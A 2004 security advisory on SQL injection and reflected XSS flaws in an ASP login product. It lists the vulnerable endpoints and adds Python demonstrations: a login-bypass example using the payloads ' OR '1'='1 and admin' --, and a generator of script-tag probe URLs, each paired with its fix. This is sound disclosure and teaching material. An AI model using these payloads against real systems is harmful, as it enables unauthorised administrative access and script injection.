Password Protect XSS and SQL-Injection vulnerabilities.
****************************************************************************************************
CRIOLABS
- Software: Password protect
- Type: User Authentication
- Company: Web Animations
- Date: 30-8-2004
****************************************************************************************************
## Software ##
Software: Password protect
Versions: All
Language: ASP
Platforms: Windows NT, 2000, XP
Web: http://www.webanimations.com.au/
Vendor description: "The ultimate protection including unlimited user names and
passwords, each checking their individual IP address. You can add 1 IP address
or include a range for users with various IP addresses when they log in."
## Affected part ##
- ChangePassword.asp (XSS in ShowMsg; SQL Injection in LoginId and OPass variables)
- index.asp (XSS in ShowMsg)
- index_next.asp (SQL Injection in admin and Pass variables)
- users_list.asp (XSS in ShowMsg variable)
- users_add.asp (XSS in ShowMsg variable, SQL Injection)
- users_edit.asp (XSS, SQL Injection)
## Vulnerabilities ##
### SQL Injection ###
A remote user can use an SQL injection attack to log in as admin or to
manipulate the database, because request parameters are placed directly into
the SQL statements.
index_next.asp, ChangePassword.asp, users_edit.asp and users_add.asp are
affected.
Example (injection points marked as (SQLInjection)):
/adminSection/index_next.asp?admin=(SQLInjection)&Pass=(SQLInjection)
/adminSection/ChangePassword.asp?LoginId=(SQLInjection)&OPass=(SQLInjection)&NPass=(SQLInjection)&CPass=(SQLInjection)
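The following is an added illustration, not part of the original advisory or
the vendor's code: it reproduces in Python (over an in-memory SQLite table) the
string-concatenated login query that classic ASP scripts of this kind typically
build from the admin and Pass parameters, shows why a quote-breaking value logs
the attacker in, and contrasts it with a parameterised query. The table name,
column names and credentials are constructed for the example; the real backend
and schema are not shown on the page, and comment syntax such as -- differs
between database engines.

```python
import sqlite3

# Constructed stand-in for the product's admin table (names are assumptions).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (admin TEXT, pass TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 's3cret')")
    return db

def login_vulnerable(db, admin, pw):
    """Mimics the concatenated query style of the vulnerable ASP login:
    the request parameters become part of the SQL text itself."""
    sql = ("SELECT COUNT(*) FROM admins WHERE admin='" + admin +
           "' AND pass='" + pw + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_fixed(db, admin, pw):
    """Same check with bound parameters: the values never reach the parser
    as SQL, so quotes and keywords in them are just data."""
    sql = "SELECT COUNT(*) FROM admins WHERE admin=? AND pass=?"
    return db.execute(sql, (admin, pw)).fetchone()[0] > 0

# Tautology in the password field: WHERE admin='x' AND pass='' OR '1'='1'
PAYLOAD_OR = "' OR '1'='1"
# Comment-out in the admin field (works where the engine accepts -- comments):
# WHERE admin='admin' --' AND pass='anything'
PAYLOAD_COMMENT = "admin' --"

def demo():
    db = make_db()
    return {
        "vuln_good":      login_vulnerable(db, "admin", "s3cret"),
        "vuln_or":        login_vulnerable(db, "x", PAYLOAD_OR),
        "vuln_comment":   login_vulnerable(db, PAYLOAD_COMMENT, "anything"),
        "fixed_good":     login_fixed(db, "admin", "s3cret"),
        "fixed_or":       login_fixed(db, "x", PAYLOAD_OR),
        "fixed_comment":  login_fixed(db, PAYLOAD_COMMENT, "anything"),
    }

if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'logged in' if ok else 'rejected'}")
```

Only the two "good" cases and the vulnerable injection cases log in; with bound
parameters both payloads are treated as literal strings and rejected. In
classic ASP the equivalent fix is an ADODB.Command with Parameters rather than
a query assembled by string concatenation.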
### Cross-site Scripting ###
This software does not filter HTML code from user-supplied input in some
scripts: the ShowMsg parameter is written back into the page unencoded, so a
crafted link executes script in the browser of whoever opens it.
Example:
/adminSection/index.asp?ShowMsg=(XSS)
/adminSection/ChangePassword.asp?ShowMsg=(XSS)
/adminSection/users_list.asp?ShowMsg=(XSS)
/adminSection/users_add.asp?ShowMsg=(XSS)
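As an added example (not the original proof of concept), the script below
builds probe URLs for the four ShowMsg reflection points listed above, mimics
the unencoded write-back of the parameter and its HTML-encoded counterpart
(what Server.HTMLEncode does in ASP), and checks a response body for an
unencoded reflection of the probe. The base URL, the page templates and the
check itself are assumptions for illustration; the product's real markup is not
shown on the page.

```python
import html
from urllib.parse import quote

# Pages the advisory lists as reflecting ShowMsg without filtering.
AFFECTED_PAGES = ["index.asp", "ChangePassword.asp", "users_list.asp", "users_add.asp"]

# Constructed probe: harmless, but unambiguous if it comes back unencoded.
PROBE = '<script>alert(1)</script>'

def probe_urls(base, marker=PROBE):
    """One test URL per affected page, with the probe in ShowMsg."""
    return [f"{base}/adminSection/{page}?ShowMsg={quote(marker)}"
            for page in AFFECTED_PAGES]

def render_vulnerable(show_msg):
    """Constructed stand-in for Response.Write of the raw parameter."""
    return f"<html><body><p>{show_msg}</p></body></html>"

def render_fixed(show_msg):
    """Same page with the parameter HTML-encoded before output."""
    return f"<html><body><p>{html.escape(show_msg, quote=True)}</p></body></html>"

def reflects_unencoded(body, marker=PROBE):
    """True when the probe appears verbatim in the response, i.e. the
    angle brackets survived and the browser would execute it."""
    return marker in body

if __name__ == "__main__":
    for url in probe_urls("http://target.example"):
        print(url)
    print("vulnerable page reflects:", reflects_unencoded(render_vulnerable(PROBE)))
    print("fixed page reflects:     ", reflects_unencoded(render_fixed(PROBE)))
```

In a real test the URLs would be fetched and each response passed to
reflects_unencoded; the constructed renderers stand in for the live pages so the
example runs offline.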
## History ##
Vendor contacted: Fri, 06 Aug 2004, no response.
## Credits ##
Criolabs staff
http://www.criolabs.net
Original advisory and proof of concept in
http://www.criolabs.net/advisories/passprotect.txt